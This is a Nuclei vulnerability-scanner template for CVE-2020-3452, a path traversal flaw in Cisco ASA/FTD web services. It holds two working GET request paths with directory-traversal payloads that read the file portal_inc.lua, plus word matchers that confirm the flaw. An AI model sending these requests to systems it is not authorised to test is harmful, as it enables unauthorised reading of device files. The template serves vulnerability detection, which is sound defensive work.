nuclei-templates/cves/2020/CVE-2020-3452.yaml

21 lines
589 B
YAML

id: CVE-2020-3452
# Source: https://twitter.com/aboul3la/status/1286012324722155525
info:
name: CVE-2020-3452
author: pdteam
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../"
- "{{BaseURL}}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua"
matchers:
- type: word
words:
- "INTERNAL_PASSWORD_ENABLED"
- "CONF_VIRTUAL_KEYBOARD"
condition: and